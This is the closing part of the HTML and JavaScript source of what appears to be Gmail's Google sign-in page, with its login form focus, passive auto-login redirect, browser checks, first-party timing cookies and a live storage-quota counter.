          var currentField = formFields[j];
          if (isFocusableEmptyField(currentField)) {
            currentField.focus();
            return;
          }
        }
      
    }
  }

  
  
    gaia_attachEvent(window, 'load', gaia_setFocus);
  
  
</script>
<script>
  var gaia_scrollToElement = function(element) {
  var calculateOffsetHeight = function(element) {
  var curtop = 0;
  if (element.offsetParent) {
  while (element) {
  curtop += element.offsetTop;
  element = element.offsetParent;
  }
  }
  return curtop;
  }
  var siginOffsetHeight = calculateOffsetHeight(element);
  var scrollHeight = siginOffsetHeight - window.innerHeight +
  element.clientHeight + 0.02 * window.innerHeight;
  window.scroll(0, scrollHeight);
  }
</script>
  <script>var f=this,g=function(b,c){var a=b.split("."),d=f;a[0]in d||!d.execScript||d.execScript("var "+a[0]);for(var e;a.length&&(e=a.shift());)a.length||void 0===c?d[e]?d=d[e]:d=d[e]={}:d[e]=c};var h=function(){try{return new XMLHttpRequest}catch(b){for(var c=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"],a=0;a<c.length;a++)try{return new ActiveXObject(c[a])}catch(d){}}return null};g("gaia.ajax.newXmlHttpRequest",h);var k=function(){this.a=h();this.parameters={}};g("gaia.ajax.XmlHttpFormRequest",k);
k.prototype.send=function(b,c){var a=[],d;for(d in this.parameters)a.push(d+"="+encodeURIComponent(this.parameters[d]));var a=a.join("&"),e=this.a;e.open("POST",b,!0);e.setRequestHeader("Content-type","application/x-www-form-urlencoded");e.onreadystatechange=function(){4==e.readyState&&c({status:e.status,text:e.responseText})};e.send(a)};k.prototype.send=k.prototype.send;
k.prototype.c=function(b,c,a){var d=this.a;d.open("POST",b,!0);d.setRequestHeader("Content-type","application/json");d.onreadystatechange=function(){4==d.readyState&&a({status:d.status,text:d.responseText})};d.send(c)};k.prototype.sendJson=k.prototype.c;k.prototype.b=function(b,c){var a=this.a;a.open("GET",b,!0);a.onreadystatechange=function(){4==a.readyState&&c({status:a.status,text:a.responseText})};a.send()};k.prototype.get=k.prototype.b;var l=/\s*;\s*/,m=function(){if(!document.cookie)return"";for(var b=document.cookie.split(l),c=0;c<b.length;c++){var a=b[c],a=a.replace(/^\s+/,""),a=a.replace(/\s+$/,"");if(0==a.indexOf("APISID="))return a.substr(7)}return""};var n=null,p=function(b,c){this.e=b;this.d=c;this.c=m();this.b=!1},q=function(){var b=n,c=m();c==b.c||b.b||(b.c=c,(new k).b(b.d,function(a){var b=n;a&&a.status&&200==a.status&&"OK"==a.text&&(b.a&&clearInterval(b.a),b.b||(window.location=b.e))}))},r=function(b){var c=n;if(c.a)return!1;c.a=setInterval(function(){q()},b);return!0};g("gaia.loginAutoRedirect.start",function(b,c,a){if(n||!a||!c||0>=b)return!1;n=new p(c,a);return r(b)});
g("gaia.loginAutoRedirect.stop",function(){var b=n;b.b=!0;b.a&&(clearInterval(b.a),b.a=null)});
</script>
  <script type="text/javascript">
  gaia.loginAutoRedirect.start(5000,
  'https:\x2F\x2Faccounts.google.com\x2FServiceLogin?continue=https%3A%2F%2Fmail.google.com%2Fmail%2F\x26osid=1\x26service=mail\x26ss=1\x26ltmpl=default\x26rm=false\x26passive=true\x26noautologin=true',
  'https:\x2F\x2Faccounts.google.com\x2FPassiveLoginProber?continue=https%3A%2F%2Fmail.google.com%2Fmail%2F\x26osid=1\x26service=mail\x26ss=1\x26ltmpl=default\x26rm=false\x26passive=true');
  </script>
<script>
  (function(){
  var signinInput = document.getElementById('signIn');
  gaia_onLoginSubmit = function() {
  try {
  document.bg.invoke(function(response) {
  document.getElementById('bgresponse').value = response;
  });
  } catch (err) {
  document.getElementById('bgresponse').value = '';
  }
  return true;
  }
  document.getElementById('gaia_loginform').onsubmit = gaia_onLoginSubmit;
  var signinButton = document.getElementById('signIn');
  gaia_attachEvent(window, 'load', function(){
  gaia_scrollToElement(signinButton);
  });
  })();
</script>
<script type="text/javascript">
var BrowserSupport_={IsBrowserSupported:function(){var agt=navigator.userAgent.toLowerCase();var is_op=agt.indexOf("opera")!=-1;var is_ie=agt.indexOf("msie")!=-1&&document.all&&!is_op;var is_ie5=agt.indexOf("msie 5")!=-1&&document.all&&!is_op;var is_mac=agt.indexOf("mac")!=-1;var is_gk=agt.indexOf("gecko")!=-1;var is_sf=agt.indexOf("safari")!=-1;if(is_ie&&!is_op&&!is_mac){if(agt.indexOf("palmsource")!=
-1||agt.indexOf("regking")!=-1||agt.indexOf("windows ce")!=-1||agt.indexOf("j2me")!=-1||agt.indexOf("avantgo")!=-1||agt.indexOf(" stb")!=-1)return false;var v=BrowserSupport_.GetFollowingFloat(agt,"msie ");if(v!=null)return v>=5.5}if(is_gk&&!is_sf){var v=BrowserSupport_.GetFollowingFloat(agt,"rv:");if(v!=null)return v>=1.4;else{v=BrowserSupport_.GetFollowingFloat(agt,"galeon/");if(v!=null)return v>=
1.3}}if(is_sf){if(agt.indexOf("rv:3.14.15.92.65")!=-1)return false;var v=BrowserSupport_.GetFollowingFloat(agt,"applewebkit/");if(v!=null)return v>=312}if(is_op){if(agt.indexOf("sony/com1")!=-1)return false;var v=BrowserSupport_.GetFollowingFloat(agt,"opera ");if(v==null)v=BrowserSupport_.GetFollowingFloat(agt,"opera/");if(v!=null)return v>=8}if(agt.indexOf("pda; sony/com2")!=-1)return true;return false},
GetFollowingFloat:function(str,pfx){var i=str.indexOf(pfx);if(i!=-1){var v=parseFloat(str.substring(i+pfx.length));if(!isNaN(v))return v}return null}};var is_browser_supported=BrowserSupport_.IsBrowserSupported()
  </script>
<script type="text/javascript">
<!--

var start_time = (new Date()).getTime();

if (top.location != self.location) {
 top.location = self.location.href;
}

function SetGmailCookie(name, value) {
  document.cookie = name + "=" + value + ";path=/;domain=.google.com";
}

function lg() {
  var now = (new Date()).getTime();

  var cookie = "T" + start_time + "/" + start_time + "/" + now;
  SetGmailCookie("GMAIL_LOGIN", cookie);
}

function StripParam(url, param) {
  var start = url.indexOf(param);
  if (start == -1) return url;
  var end = start + param.length;

  var charBefore = url.charAt(start-1);
  if (charBefore != '?' && charBefore != '&') return url;

  var charAfter = (url.length >= end+1) ? url.charAt(end) : '';
  if (charAfter != '' && charAfter != '&' && charAfter != '#') return url;
  if (charBefore == '&') {
  --start;
  } else if (charAfter == '&') {
  ++end;
  }
  return url.substring(0, start) + url.substring(end);
}
var fixed = 0;
function FixForm() {
  if (is_browser_supported) {
  var form = el("gaia_loginform");
  if (form && form["continue"]) {
  var url = form["continue"].value;
  url = StripParam(url, "ui=html");
  url = StripParam(url, "zy=l");
  form["continue"].value = url;
  }
  }
  fixed = 1;
}
function el(id) {
  if (document.getElementById) {
  return document.getElementById(id);
  } else if (window[id]) {
  return window[id];
  }
  return null;
}
// Estimates of nanite storage generation over time.
var CP = [
 [ 1224486000000, 7254 ],
 [ 1335290400000, 7704 ],
 [ 1335376800000, 10240 ],
 [ 2144908800000, 13531 ],
 [ 2147328000000, 43008 ],
 [ 46893711600000, Number.MAX_VALUE ]
];
var quota_elem;
var ONE_PX = "https://mail.google.com/mail/images/cleardot.gif?t=" +
  (new Date()).getTime();
function LogRoundtripTime() {
  var img = new Image();
  var start = (new Date()).getTime();
  img.onload = GetRoundtripTimeFunction(start);
  img.src = ONE_PX;
}
function GetRoundtripTimeFunction(start) {
  return function() {
  var end = (new Date()).getTime();
  SetGmailCookie("GMAIL_RTT", (end - start));
  }
}
function MaybePingUser() {
  var f = el("gaia_loginform");
  if (f.Email.value) {
  new Image().src = 'https://mail.google.com/mail/gxlu?email=' +
  encodeURIComponent(f.Email.value) +
  '&zx=' + (new Date().getTime());
  }
}
function OnLoad() {
  MaybePingUser();
  var passwd_elem = el("Passwd");
  if (passwd_elem) {
  passwd_elem.onfocus = MaybePingUser;
  }
  LogRoundtripTime();
  if (!quota_elem) {
  quota_elem = el("quota");
  updateQuota();
  }
  LoadConversionScript();
}
function updateQuota() {
  if (!quota_elem) {
  return;
  }
  var now = (new Date()).getTime();
  var i;
  for (i = 0; i < CP.length; i++) {
    if (now < CP[i][0]) {
      break;
    }
  }
  if (i == 0) {
    setTimeout(updateQuota, 1000);
  } else if (i == CP.length) {
    quota_elem.innerHTML = CP[i - 1][1];
  } else {
    var ts = CP[i - 1][0];
    var bs = CP[i - 1][1];
    quota_elem.innerHTML = format(((now-ts) / (CP[i][0]-ts) * (CP[i][1]-bs)) + bs);
    setTimeout(updateQuota, 1000);
  }
}

var PAD = '.000000';

function format(num) {
  var str = String(num);
  var dot = str.indexOf('.');
  if (dot < 0) {
     return str + PAD;
  } if (PAD.length > (str.length - dot)) {
  return str + PAD.substring(str.length - dot);
  } else {
  return str.substring(0, dot + PAD.length);
  }
}
var google_conversion_type = 'landing';
var google_conversion_id = 1069902127;
var google_conversion_language = "en_US";
var google_conversion_format = "1";
var google_conversion_color = "FFFFFF";
function LoadConversionScript() {
  var script = document.createElement("script");
  script.type = "text/javascript";
  script.src = "https://www.googleadservices.com/pagead/conversion.js";
}
// -->
</script>
<script>
gaia_attachEvent(window, 'load', function() {
  OnLoad();
  FixForm();
});
(function() {
  var gaiaLoginForm = document.getElementById('gaia_loginform');
  var gaia_onsubmitHandler = gaiaLoginForm.onsubmit;
  gaiaLoginForm.onsubmit = function() {
  lg();
  if (!fixed) {
  FixForm();
  }
  gaia_onsubmitHandler();
  };
})();
</script>
  


</body></html>